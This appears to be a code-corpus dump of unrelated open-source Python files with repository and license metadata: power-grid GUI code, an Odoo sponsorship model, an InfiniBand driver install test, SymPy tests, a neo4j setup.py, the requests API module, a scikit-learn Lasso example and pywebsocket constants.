remove(self): """ Remove this object in the diagram and the API @return: """ ok = yes_no_question('Do you want to remove this UPFC?', 'Remove UPFC') if ok: self.diagramScene.circuit.delete_branch(self.api_object) self.diagramScene.removeItem(self) def reduce(self): """ Reduce this branch """ ok = yes_no_question('Do you want to reduce this UPFC?', 'Remove UPFC') if ok: # get the index of the branch br_idx = self.diagramScene.circuit.branches.index(self.api_object) # call the reduction routine removed_branch, removed_bus, \ updated_bus, updated_branches = reduce_grid_brute(self.diagramScene.circuit, br_idx) # remove the reduced branch removed_branch.graphic_obj.remove_symbol() self.diagramScene.removeItem(removed_branch.graphic_obj) # update the buses (the deleted one and the updated one) if removed_bus is not None: # merge the removed bus with the remaining one updated_bus.graphic_obj.merge(removed_bus.graphic_obj) # remove the updated bus children for g in updated_bus.graphic_obj.shunt_children: self.diagramScene.removeItem(g.nexus) self.diagramScene.removeItem(g) # re-draw the children updated_bus.graphic_obj.create_children_icons() # remove bus for g in removed_bus.graphic_obj.shunt_children: self.diagramScene.removeItem(g.nexus) # remove the links between the bus and the children self.diagramScene.removeItem(removed_bus.graphic_obj) # remove the bus and all the children contained for br in updated_branches: # remove the branch from the schematic self.diagramScene.removeItem(br.graphic_obj) # add the branch to the schematic with the rerouting and all self.diagramScene.parent_.add_line(br) # update both buses br.bus_from.graphic_obj.update() br.bus_to.graphic_obj.update() def remove_widget(self): """ Remove this object in the diagram @return: """ self.diagramScene.removeItem(self) def enable_disable_toggle(self): """ @return: """ if self.api_object is not None: if self.api_object.active: self.set_enable(False) else: self.set_enable(True) def set_enable(self, 
val=True): """ Set the enable value, graphically and in the API @param val: @return: """ self.api_object.active = val if self.api_object is not None: if self.api_object.active: self.style = ACTIVE['style'] self.color = ACTIVE['color'] else: self.style = DEACTIVATED['style'] self.color = DEACTIVATED['color'] else: self.style = OTHER['style'] self.color = OTHER['color'] # Switch coloring if self.symbol_type == BranchType.Switch: if self.api_object.active: self.symbol.setBrush(self.color) else: self.symbol.setBrush(Qt.white) if self.symbol_type == BranchType.DCLine: self.symbol.setBrush(self.color) if self.api_object.active: self.symbol.setPen(QPen(ACTIVE['color'])) else: self.symbol.setPen(QPen(DEACTIVATED['color'])) # Set pen for everyone self.set_pen(QPen(self.color, self.width, self.style)) def plot_profiles(self): """ Plot the time series profiles @return: """ i = self.diagramScene.circuit.get_branches().index(self.api_object) self.diagramScene.plot_branch(i, self.api_object) def setFromPort(self, fromPort): """ Set the From terminal in a connection @param fromPort: @return: """ self.fromPort = fromPort if self.fromPort: self.pos1 = fromPort.scenePos() self.fromPort.posCallbacks.append(self.setBeginPos) self.fromPort.parent.setZValue(0) def setToPort(self, toPort): """ Set the To terminal in a connection @param toPort: @return: """ self.toPort = toPort if self.toPort: self.pos2 = toPort.scenePos() self.toPort.posCallbacks.append(self.setEndPos) self.toPort.parent.setZValue(0) def setEndPos(self, endpos): """ Set the starting position @param endpos: @return: """ self.pos2 = endpos self.redraw() def setBeginPos(self, pos1): """ Set the starting position @param pos1: @return: """ self.pos1 = pos1 self.redraw() def redraw(self): """ Redraw the line with the given positions @return: """ if self.pos1 is not None and self.pos2 is not None: # Set position self.setLine(QLineF(self.pos1, self.pos2)) # set Z-Order (to the back) self.setZValue(-1) if self.api_object is not 
None: # if the branch has a moveable symbol, move it try: h = self.pos2.y() - self.pos1.y() b = self.pos2.x() - self.pos1.x() ang = np.arctan2(h, b) h2 = self.symbol.rect().height() / 2.0 w2 = self.symbol.rect().width() / 2.0 a = h2 * np.cos(ang) - w2 * np.sin(ang) b = w2 * np.sin(ang) + h2 * np.cos(ang) center = (self.pos1 + self.pos2) * 0.5 - QPointF(a, b) transform = QTransform() transform.translate(center.x(), center.y()) transform.rotate(np.rad2deg(ang)) self.symbol.setTransform(transform) except Exception as ex: print(ex) def set_pen(self, pen): """ Set pen to all objects Args: pen: """ self.setPen(pen) if self.symbol is not None: self.symbol.setPen(pen) def edit(self): """ Open the appropriate editor dialogue :return: """ Sbase = self.diagramScene.circuit.Sbase dlg = UpfcEditor(self.api_object, Sbase) if dlg.exec_(): pass def add_to_templates(self): """ Open the appropriate editor dialogue :return: """ Sbase = self.diagramScene.circuit.Sbase dlg = UpfcEditor(self.api_object, Sbase) if dlg.exec_(): pass def assign_rate_to_profile(self): """ Assign the snapshot rate to the profile """ self.diagramScene.set_rate_to_profile(self.api_object) def assign_status_to_profile(self): """ Assign the snapshot rate to the profile """ self.diagramScene.set_active_status_to_profile(self.api_object)
gpl-3.0
Secheron/compassion-modules
sponsorship_tracking/model/contracts.py
2
12602
# -*- encoding: utf-8 -*- ############################################################################## # # Copyright (C) 2015 Compassion CH (http://www.compassion.ch) # Releasing children from poverty in Jesus' name # @author: David Coninckx, Emanuel Cino # # The licence is in the file __openerp__.py # ############################################################################## from openerp import api, models, fields, exceptions, _ from openerp.tools import DEFAULT_SERVER_DATE_FORMAT as DF from datetime import datetime, date, timedelta import logging logger = logging.getLogger(__name__) class recurring_contract(models.Model): _inherit = "recurring.contract" ########################################################################## # FIELDS # ########################################################################## sds_state = fields.Selection( '_get_sds_states', 'SDS Status', readonly=True, track_visibility='onchange', select=True, copy=False) sds_state_date = fields.Date( 'SDS state date', readonly=True, copy=False) project_id = fields.Many2one( 'compassion.project', 'Project', related='child_id.project_id', readonly=True) project_state = fields.Selection( '_get_project_states', 'Project Status', select=True, readonly=True, track_visibility='onchange') color = fields.Integer('Color Index') no_sub_reason = fields.Char('No sub reason') sds_uid = fields.Many2one( 'res.users', 'SDS Follower', default=lambda self: self.env.user) ########################################################################## # FIELDS METHODS # ########################################################################## def _get_sds_states(self): return [ ('draft', _('Draft')), ('start', _('Start')), ('waiting_welcome', _('Waiting welcome')), ('active', _('Active')), ('field_memo', _('Field memo')), ('sub_waiting', _('Sub waiting')), ('sub', _('Sub')), ('sub_accept', _('Sub Accept')), ('sub_reject', _('Sub Reject')), ('inform_no_sub', _('Inform No sub')), ('no_sub', _('No sub')), 
('cancelled', _('Cancelled')) ] def _get_project_states(self): return [ ('active', _('Active')), ('inform_suspended', _('Inform fund suspension')), ('fund-suspended', _('Fund Suspended')), ('inform_reactivation', _('Inform reactivation')), ('inform_extension', _('Inform extension')), ('inform_suspended_reactivation', _('Inform suspended and reactivation')), ('inform_project_terminated', _('Inform project terminated')), ('phase_out', _('Phase out')), ('terminated', _('Terminated')) ] ########################################################################## # ORM METHODS # ########################################################################## @api.multi def write(self, vals): if 'sds_state' in vals: vals['sds_state_date'] = date.today().strftime(DF) if 'parent_id' in vals: self._parent_id_changed(vals['parent_id']) return super(recurring_contract, self).write(vals) ########################################################################## # VIEW CALLBACKS # ########################################################################## # Kanban Buttons ################ @api.model def button_mail_sent(self, value): """Button in Kanban view calling action on all contracts of one group. """ contracts = self.search([('sds_state', '=', value)]) contracts.signal_workflow('mail_sent') return True @api.model def button_project_mail_sent(self, value): """Button in Kanban view calling action on all contracts of one group. """ contracts = self.search([('project_state', '=', value)]) contracts.signal_workflow('project_mail_sent') return True @api.model def button_reset_gmc_state(self, value): """ Button called from Kanban view on all contracts of one group. """ contracts = self.search([('gmc_state', '=', value)]) return contracts.reset_gmc_state() # CRON Methods ############## @api.model def check_sub_duration(self): """ Check all sponsorships in SUB State. 
After 50 days SUB Sponsorship started, Sponsorship becomes : - SUB Accept if SUB sponsorship is active - SUB Reject otherwise """ fifty_days_ago = date.today() + timedelta(days=-50) contracts = self.search([('sds_state', '=', 'sub')]) for contract in contracts: transition = 'sub_reject' sub_sponsorships = self.search([('parent_id', '=', contract.id)]) if sub_sponsorships: for sub_contract in sub_sponsorships: if sub_contract.state == 'active' or \ sub_contract.end_reason == 1: transition = 'sub_accept' break contract.write({'color': 5 if transition == 'sub_accept' else 2}) sub_start_date = datetime.strptime( sub_contract.start_date, DF).date() if sub_start_date < fifty_days_ago: contract.signal_workflow(transition) return True @api.model def check_waiting_welcome_duration(self): """ Check all sponsorships in Waiting Welcome state. Put them in light green color after 10 days, indicating the mailing should be sent. """ ten_days_ago = date.today() + timedelta(days=-10) contracts = self.search([ ('sds_state_date', '<', ten_days_ago), ('sds_state', '=', 'waiting_welcome')]) return contracts.write({'color': 4}) @api.model def end_workflow(self): """ Terminate all workflows related to inactive contracts. """ inactive_contracts = self.search([ ('sds_state', 'in', ['cancelled', 'no_sub', 'sub_accept', 'sub_reject']), ('state', 'in', ['terminated', 'cancelled'])]) inactive_contracts.delete_workflow() return True # Other view callbacks ###################### @api.onchange('partner_id') def on_change_partner_id(self): """ Find parent sponsorship if any is sub_waiting. 
""" super(recurring_contract, self).on_change_partner_id() if 'S' in self.type: origin_id = self.env['recurring.contract.origin'].search( [('type', '=', 'sub')]).ids[0] correspondant_id = self.correspondant_id.id parent_id = self._define_parent_id(correspondant_id) if parent_id and self.state == 'draft': self.parent_id = parent_id self.origin_id = origin_id @api.multi def switch_contract_view(self): ir_model_data = self.env['ir.model.data'] view_id = ir_model_data.get_object_reference( 'sponsorship_tracking', self.env.context['view_id'])[1] return { 'view_type': 'form', 'view_mode': 'form', 'views': [(view_id, 'form')], 'res_model': self._name, 'type': 'ir.actions.act_window', 'target': 'current', "res_id": self.ids[0], } @api.multi def mail_sent(self): return self.signal_workflow('mail_sent') @api.multi def project_mail_sent(self): return self.signal_workflow('project_mail_sent') # KANBAN GROUP METHODS ###################### @api.model def sds_kanban_groups(self, ids, domain, **kwargs): fold = { 'active': True, 'sub_accept': True, 'sub_reject': True, 'no_sub': True, 'cancelled': True } sds_states = self._get_sds_states() display_states = list() for sds_state in sds_states: sponsorship_count = self.search_count([ ('sds_state', '=', sds_state[0])]) if sponsorship_count: display_states.append(sds_state) return display_states, fold @api.model def _read_group_fill_results(self, domain, groupby, remaining_groupbys, aggregated_fields, count_field, read_group_result, read_group_order=None): """ The method seems to support grouping using m2o fields only, while we want to group by a simple status field. Hence the code below - it replaces simple status values with (value, name) tuples. 
""" if groupby == 'sds_state': state_dict = dict(self._get_sds_states()) for result in read_group_result: state = result[groupby] result[groupby] = (state, state_dict.get(state)) return super(recurring_contract, self)._read_group_fill_results( domain, groupby, remaining_groupbys, aggregated_fields, count_field, read_group_result, read_group_order ) _group_by_full = { 'sds_state': sds_kanban_groups, } ########################################################################## # WORKFLOW METHODS # ########################################################################## @api.multi def contract_validation(self): for contract in self: if contract.parent_id: logger.info("Contract " + str(contract.id) + " contract sub.") contract.parent_id.signal_workflow('new_contract_validated') return True @api.multi def contract_cancelled(self): """ Project state is no more relevant when contract is cancelled. """ res = super(recurring_contract, self).contract_cancelled() self.write({'project_state': False}) return res @api.multi def contract_terminated(self): """ Project state is no more relevant when contract is terminated. We also put the person who terminated the contract as follower. """ res = super(recurring_contract, self).contract_terminated() self.write({'project_state': False, 'sds_uid': self.env.user.id}) return res ########################################################################## # PRIVATE METHODS # ########################################################################## def _define_parent_id(self, correspondant_id): same_partner_contracts = self.search( [('correspondant_id', '=', correspondant_id), ('sds_state', '=', 'sub_waiting')]) for same_partner_contract in same_partner_contracts: if not self.search_count([ ('parent_id', '=', same_partner_contract.id)]): return same_partner_contract.id return False def _parent_id_changed(self, parent_id): """ If contract is already validated and parent is sub_waiting, mark the sub. 
""" for contract in self: if 'S' in contract.type and contract.state != 'draft': if contract.parent_id: raise exceptions.Warning( _("Operation Failure"), _("You cannot change the sub sponsorship.")) parent = self.browse(parent_id) if parent.sds_state == 'sub_waiting': parent.signal_workflow('new_contract_validated')
agpl-3.0
apahim/avocado-misc-tests
io/net/infiniband/mofed_install_test.py
1
2704
#!/usr/bin/env python

# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
#
# See LICENSE for more details.
#
# Copyright: 2016 IBM
# Author: Narasimhan V <sim@linux.vnet.ibm.com>

"""
MOFED Install Test
"""

import os

from avocado import Test
from avocado import main
from avocado.utils import process


class MOFEDInstallTest(Test):

    """
    This test verifies the installation of MOFED iso with different
    combinations of input parameters, as specified in multiplexer file.
    """

    def setUp(self):
        """
        Fetch the MOFED iso named by the ``iso_location`` parameter and
        loop-mount it on the test's source directory.
        """
        self.iso_location = self.params.get('iso_location', default='')
        # BUG FIX: the original tested "self.iso_location is ''", which
        # compares object *identity*, not value -- string literals are not
        # guaranteed to be interned, so the skip could silently never
        # trigger.  A plain truthiness check is the correct test.
        if not self.iso_location:
            self.skip("No ISO location given")
        self.option = self.params.get('option', default='')
        self.uninstall_flag = self.params.get('uninstall', default=True)
        self.iso = self.fetch_asset(self.iso_location, expire='10d')
        cmd = "mount -o loop %s %s" % (self.iso, self.srcdir)
        process.run(cmd, shell=True)
        # Remember the caller's working directory so tearDown can restore it
        # after install() chdirs into the mounted iso.
        self.pwd = os.getcwd()

    def install(self):
        """
        Installs MOFED with given options; fails the test if the installer
        exits non-zero.
        """
        self.log.info("Starting installation")
        os.chdir(self.srcdir)
        cmd = './mlnxofedinstall %s --force' % self.option
        if process.system(cmd, ignore_status=True, shell=True):
            self.fail("Install Failed with %s" % self.option)

    def uninstall(self):
        """
        Uninstalls MOFED, if installed fine.

        NOTE(review): the early returns below skip uninstallation whenever
        "openibd restart" or "ibstat" exit *successfully* (status 0), i.e.
        the stack is only removed when it looks broken.  This preserves the
        original behaviour -- confirm that it is intentional.
        """
        self.log.info("Starting uninstallation")
        cmd = "/etc/init.d/openibd restart"
        if not process.system(cmd, ignore_status=True, shell=True):
            return
        cmd = "ibstat"
        if not process.system(cmd, ignore_status=True, shell=True):
            return
        cmd = './uninstall.sh --force'
        if process.system(cmd, ignore_status=True, shell=True):
            self.fail("Uninstall Failed")

    def test(self):
        """
        Tests install and (optionally) uninstall of MOFED.
        """
        self.install()
        if self.uninstall_flag:
            self.uninstall()

    def tearDown(self):
        """
        Clean up: restore the working directory and unmount the iso.
        """
        os.chdir(self.pwd)
        cmd = "umount %s" % self.srcdir
        process.run(cmd, shell=True)


if __name__ == "__main__":
    main()
gpl-2.0
jaimahajan1997/sympy
sympy/core/tests/test_count_ops.py
36
4575
from sympy import symbols, sin, exp, cos, Derivative, Integral, Basic, \ count_ops, S, And, I, pi, Eq, Or, Not, Xor, Nand, Nor, Implies, \ Equivalent, MatrixSymbol, Symbol, ITE from sympy.core.containers import Tuple x, y, z = symbols('x,y,z') a, b, c = symbols('a,b,c') def test_count_ops_non_visual(): def count(val): return count_ops(val, visual=False) assert count(x) == 0 assert count(x) is not S.Zero assert count(x + y) == 1 assert count(x + y) is not S.One assert count(x + y*x + 2*y) == 4 assert count({x + y: x}) == 1 assert count({x + y: S(2) + x}) is not S.One assert count(Or(x,y)) == 1 assert count(And(x,y)) == 1 assert count(Not(x)) == 1 assert count(Nor(x,y)) == 2 assert count(Nand(x,y)) == 2 assert count(Xor(x,y)) == 1 assert count(Implies(x,y)) == 1 assert count(Equivalent(x,y)) == 1 assert count(ITE(x,y,z)) == 1 assert count(ITE(True,x,y)) == 0 def test_count_ops_visual(): ADD, MUL, POW, SIN, COS, EXP, AND, D, G = symbols( 'Add Mul Pow sin cos exp And Derivative Integral'.upper()) DIV, SUB, NEG = symbols('DIV SUB NEG') NOT, OR, AND, XOR, IMPLIES, EQUIVALENT, ITE, BASIC, TUPLE = symbols( 'Not Or And Xor Implies Equivalent ITE Basic Tuple'.upper()) def count(val): return count_ops(val, visual=True) assert count(7) is S.Zero assert count(S(7)) is S.Zero assert count(-1) == NEG assert count(-2) == NEG assert count(S(2)/3) == DIV assert count(pi/3) == DIV assert count(-pi/3) == DIV + NEG assert count(I - 1) == SUB assert count(1 - I) == SUB assert count(1 - 2*I) == SUB + MUL assert count(x) is S.Zero assert count(-x) == NEG assert count(-2*x/3) == NEG + DIV + MUL assert count(1/x) == DIV assert count(1/(x*y)) == DIV + MUL assert count(-1/x) == NEG + DIV assert count(-2/x) == NEG + DIV assert count(x/y) == DIV assert count(-x/y) == NEG + DIV assert count(x**2) == POW assert count(-x**2) == POW + NEG assert count(-2*x**2) == POW + MUL + NEG assert count(x + pi/3) == ADD + DIV assert count(x + S(1)/3) == ADD + DIV assert count(x + y) == ADD assert count(x - y) 
== SUB assert count(y - x) == SUB assert count(-1/(x - y)) == DIV + NEG + SUB assert count(-1/(y - x)) == DIV + NEG + SUB assert count(1 + x**y) == ADD + POW assert count(1 + x + y) == 2*ADD assert count(1 + x + y + z) == 3*ADD assert count(1 + x**y + 2*x*y + y**2) == 3*ADD + 2*POW + 2*MUL assert count(2*z + y + x + 1) == 3*ADD + MUL assert count(2*z + y**17 + x + 1) == 3*ADD + MUL + POW assert count(2*z + y**17 + x + sin(x)) == 3*ADD + POW + MUL + SIN assert count(2*z + y**17 + x + sin(x**2)) == 3*ADD + MUL + 2*POW + SIN assert count(2*z + y**17 + x + sin( x**2) + exp(cos(x))) == 4*ADD + MUL + 2*POW + EXP + COS + SIN assert count(Derivative(x, x)) == D assert count(Integral(x, x) + 2*x/(1 + x)) == G + DIV + MUL + 2*ADD assert count(Basic()) is S.Zero assert count({x + 1: sin(x)}) == ADD + SIN assert count([x + 1, sin(x) + y, None]) == ADD + SIN + ADD assert count({x + 1: sin(x), y: cos(x) + 1}) == SIN + COS + 2*ADD assert count({}) is S.Zero assert count([x + 1, sin(x)*y, None]) == SIN + ADD + MUL assert count([]) is S.Zero assert count(Basic()) == 0 assert count(Basic(Basic(),Basic(x,x+y))) == ADD + 2*BASIC assert count(Basic(x, x + y)) == ADD + BASIC assert count(Or(x,y)) == OR assert count(And(x,y)) == AND assert count(And(x**y,z)) == AND + POW assert count(Or(x,Or(y,And(z,a)))) == AND + OR assert count(Nor(x,y)) == NOT + OR assert count(Nand(x,y)) == NOT + AND assert count(Xor(x,y)) == XOR assert count(Implies(x,y)) == IMPLIES assert count(Equivalent(x,y)) == EQUIVALENT assert count(ITE(x,y,z)) == ITE assert count([Or(x,y), And(x,y), Basic(x+y)]) == ADD + AND + BASIC + OR assert count(Basic(Tuple(x))) == BASIC + TUPLE #It checks that TUPLE is counted as an operation. 
assert count(Eq(x + y, S(2))) == ADD def test_issue_9324(): def count(val): return count_ops(val, visual=False) M = MatrixSymbol('M', 10, 10) assert count(M[0, 0]) == 0 assert count(2 * M[0, 0] + M[5, 7]) == 2 P = MatrixSymbol('P', 3, 3) Q = MatrixSymbol('Q', 3, 3) assert count(P + Q) == 3 m = Symbol('m', integer=True) n = Symbol('n', integer=True) M = MatrixSymbol('M', m + n, m * m) assert count(M[0, 1]) == 2
bsd-3-clause
neo4j-contrib/python-embedded
src/main/python/setup.py
1
1815
# -*- mode: Python; coding: utf-8 -*- # Copyright (c) 2002-2013 "Neo Technology," # Network Engine for Objects in Lund AB [http://neotechnology.com] # # This file is part of Neo4j. # # Neo4j is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. #!/usr/bin/env python from distutils.core import setup with open('README.txt') as file: long_description = file.read() setup( name='neo4j-embedded', # This is auto-generated by the # maven build that runs this project version='${pythonic_version}', description='Bindings for the embedded version of the neo4j graph database.', long_description=long_description, author='Neo Technology', author_email='python@neotechnology.com', url='https://github.com/neo4j/python-embedded', packages=( 'neo4j', 'neo4j.javalib', ), install_requires=( 'setuptools', ), package_data = { # Include our java dependencies '': ['*.jar'], }, classifiers=( 'License :: OSI Approved :: GNU General Public License (GPL)', 'Topic :: Database :: Database Engines/Servers', 'Programming Language :: Python :: 2.7', 'Programming Language :: Java', ), )
gpl-3.0
gauribhoite/personfinder
rtd/lib/python2.7/site-packages/pip/_vendor/requests/api.py
435
5415
# -*- coding: utf-8 -*- """ requests.api ~~~~~~~~~~~~ This module implements the Requests API. :copyright: (c) 2012 by Kenneth Reitz. :license: Apache2, see LICENSE for more details. """ from . import sessions def request(method, url, **kwargs): """Constructs and sends a :class:`Request <Request>`. :param method: method for the new :class:`Request` object. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json data to send in the body of the :class:`Request`. :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': ('filename', fileobj)}``) for multipart encoding upload. :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. :param timeout: (optional) How long to wait for the server to send data before giving up, as a float, or a (`connect timeout, read timeout <user/advanced.html#timeouts>`_) tuple. :type timeout: float or tuple :param allow_redirects: (optional) Boolean. Set to True if POST/PUT/DELETE redirect following is allowed. :type allow_redirects: bool :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. :param verify: (optional) if ``True``, the SSL cert will be verified. A CA_BUNDLE path can also be provided. :param stream: (optional) if ``False``, the response content will be immediately downloaded. :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. 
:return: :class:`Response <Response>` object :rtype: requests.Response Usage:: >>> import requests >>> req = requests.request('GET', 'http://httpbin.org/get') <Response [200]> """ session = sessions.Session() response = session.request(method=method, url=url, **kwargs) # By explicitly closing the session, we avoid leaving sockets open which # can trigger a ResourceWarning in some cases, and look like a memory leak # in others. session.close() return response def get(url, params=None, **kwargs): """Sends a GET request. :param url: URL for the new :class:`Request` object. :param params: (optional) Dictionary or bytes to be sent in the query string for the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault('allow_redirects', True) return request('get', url, params=params, **kwargs) def options(url, **kwargs): """Sends a OPTIONS request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault('allow_redirects', True) return request('options', url, **kwargs) def head(url, **kwargs): """Sends a HEAD request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ kwargs.setdefault('allow_redirects', False) return request('head', url, **kwargs) def post(url, data=None, json=None, **kwargs): """Sends a POST request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param json: (optional) json data to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. 
:return: :class:`Response <Response>` object :rtype: requests.Response """ return request('post', url, data=data, json=json, **kwargs) def put(url, data=None, **kwargs): """Sends a PUT request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('put', url, data=data, **kwargs) def patch(url, data=None, **kwargs): """Sends a PATCH request. :param url: URL for the new :class:`Request` object. :param data: (optional) Dictionary, bytes, or file-like object to send in the body of the :class:`Request`. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('patch', url, data=data, **kwargs) def delete(url, **kwargs): """Sends a DELETE request. :param url: URL for the new :class:`Request` object. :param \*\*kwargs: Optional arguments that ``request`` takes. :return: :class:`Response <Response>` object :rtype: requests.Response """ return request('delete', url, **kwargs)
apache-2.0
saiwing-yeung/scikit-learn
examples/linear_model/lasso_dense_vs_sparse_data.py
348
1862
""" ============================== Lasso on dense and sparse data ============================== We show that linear_model.Lasso provides the same results for dense and sparse data and that in the case of sparse data the speed is improved. """ print(__doc__) from time import time from scipy import sparse from scipy import linalg from sklearn.datasets.samples_generator import make_regression from sklearn.linear_model import Lasso ############################################################################### # The two Lasso implementations on Dense data print("--- Dense matrices") X, y = make_regression(n_samples=200, n_features=5000, random_state=0) X_sp = sparse.coo_matrix(X) alpha = 1 sparse_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=1000) dense_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=1000) t0 = time() sparse_lasso.fit(X_sp, y) print("Sparse Lasso done in %fs" % (time() - t0)) t0 = time() dense_lasso.fit(X, y) print("Dense Lasso done in %fs" % (time() - t0)) print("Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_ - dense_lasso.coef_)) ############################################################################### # The two Lasso implementations on Sparse data print("--- Sparse matrices") Xs = X.copy() Xs[Xs < 2.5] = 0.0 Xs = sparse.coo_matrix(Xs) Xs = Xs.tocsc() print("Matrix density : %s %%" % (Xs.nnz / float(X.size) * 100)) alpha = 0.1 sparse_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=10000) dense_lasso = Lasso(alpha=alpha, fit_intercept=False, max_iter=10000) t0 = time() sparse_lasso.fit(Xs, y) print("Sparse Lasso done in %fs" % (time() - t0)) t0 = time() dense_lasso.fit(Xs.toarray(), y) print("Dense Lasso done in %fs" % (time() - t0)) print("Distance between coefficients : %s" % linalg.norm(sparse_lasso.coef_ - dense_lasso.coef_))
bsd-3-clause
yoava333/servo
tests/wpt/web-platform-tests/tools/pywebsocket/src/mod_pywebsocket/common.py
489
9947
# Copyright 2012, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """This file must not depend on any module specific to the WebSocket protocol. """ from mod_pywebsocket import http_header_util # Additional log level definitions. LOGLEVEL_FINE = 9 # Constants indicating WebSocket protocol version. 
VERSION_HIXIE75 = -1 VERSION_HYBI00 = 0 VERSION_HYBI01 = 1 VERSION_HYBI02 = 2 VERSION_HYBI03 = 2 VERSION_HYBI04 = 4 VERSION_HYBI05 = 5 VERSION_HYBI06 = 6 VERSION_HYBI07 = 7 VERSION_HYBI08 = 8 VERSION_HYBI09 = 8 VERSION_HYBI10 = 8 VERSION_HYBI11 = 8 VERSION_HYBI12 = 8 VERSION_HYBI13 = 13 VERSION_HYBI14 = 13 VERSION_HYBI15 = 13 VERSION_HYBI16 = 13 VERSION_HYBI17 = 13 # Constants indicating WebSocket protocol latest version. VERSION_HYBI_LATEST = VERSION_HYBI13 # Port numbers DEFAULT_WEB_SOCKET_PORT = 80 DEFAULT_WEB_SOCKET_SECURE_PORT = 443 # Schemes WEB_SOCKET_SCHEME = 'ws' WEB_SOCKET_SECURE_SCHEME = 'wss' # Frame opcodes defined in the spec. OPCODE_CONTINUATION = 0x0 OPCODE_TEXT = 0x1 OPCODE_BINARY = 0x2 OPCODE_CLOSE = 0x8 OPCODE_PING = 0x9 OPCODE_PONG = 0xa # UUIDs used by HyBi 04 and later opening handshake and frame masking. WEBSOCKET_ACCEPT_UUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11' # Opening handshake header names and expected values. UPGRADE_HEADER = 'Upgrade' WEBSOCKET_UPGRADE_TYPE = 'websocket' WEBSOCKET_UPGRADE_TYPE_HIXIE75 = 'WebSocket' CONNECTION_HEADER = 'Connection' UPGRADE_CONNECTION_TYPE = 'Upgrade' HOST_HEADER = 'Host' ORIGIN_HEADER = 'Origin' SEC_WEBSOCKET_ORIGIN_HEADER = 'Sec-WebSocket-Origin' SEC_WEBSOCKET_KEY_HEADER = 'Sec-WebSocket-Key' SEC_WEBSOCKET_ACCEPT_HEADER = 'Sec-WebSocket-Accept' SEC_WEBSOCKET_VERSION_HEADER = 'Sec-WebSocket-Version' SEC_WEBSOCKET_PROTOCOL_HEADER = 'Sec-WebSocket-Protocol' SEC_WEBSOCKET_EXTENSIONS_HEADER = 'Sec-WebSocket-Extensions' SEC_WEBSOCKET_DRAFT_HEADER = 'Sec-WebSocket-Draft' SEC_WEBSOCKET_KEY1_HEADER = 'Sec-WebSocket-Key1' SEC_WEBSOCKET_KEY2_HEADER = 'Sec-WebSocket-Key2' SEC_WEBSOCKET_LOCATION_HEADER = 'Sec-WebSocket-Location' # Extensions DEFLATE_FRAME_EXTENSION = 'deflate-frame' PERMESSAGE_COMPRESSION_EXTENSION = 'permessage-compress' PERMESSAGE_DEFLATE_EXTENSION = 'permessage-deflate' 